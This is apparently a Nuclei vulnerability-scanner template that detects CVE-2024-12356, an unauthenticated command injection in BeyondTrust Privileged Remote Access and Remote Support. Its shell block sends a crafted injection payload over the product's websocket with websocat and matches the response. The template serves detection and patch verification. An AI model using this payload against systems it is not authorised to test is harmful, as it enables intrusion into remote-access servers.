nuclei-templates/code/cves/2024/CVE-2024-12356.yaml

id: CVE-2024-12356

info:
  name: Privileged Remote Access & Remote Support - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
  remediation: |
    Apply the security patches provided by BeyondTrust for Privileged Remote Access and Remote Support products and restrict network access to trusted sources.
  impact: |
    Attackers can execute arbitrary commands as a site user, potentially leading to full system compromise or data breach.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12356
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12356
    cwe-id: CWE-77
    epss-score: 0.93778
    epss-percentile: 0.99847
    cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
  metadata:
    vendor: beyondtrust
    product: privileged_remote_access
    verified: true
  tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev,vkev,vuln

code:
  - engine:
      - sh
      - bash
    source: |
      # brew install websocat
      company=`curl -k -s "$Scheme://$Host/get_portal_info" | cut -d '=' -f2 | tail -n 1 | cut -d';' -f1`
      echo -ne "1\n\n0\n\xC0';select 1 -- -\n" | websocat -k wss://$Host/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: $company" --binary -n --max-messages-rev 2

    matchers:
      - type: word
        part: response
        words:
          - "0 success"
          - "1 try again later"
# digest: 4a0a0047304502200819fa2a5f6bf893a326e6cd5e61a96da9eec81d3a468423947b3cda5b45b10a022100c2f774f6ba2633650e5f73308e46a5ee4545577dbcac43cd214d80ebe942c1b2:922c64590222798bb761d5b6d8e72950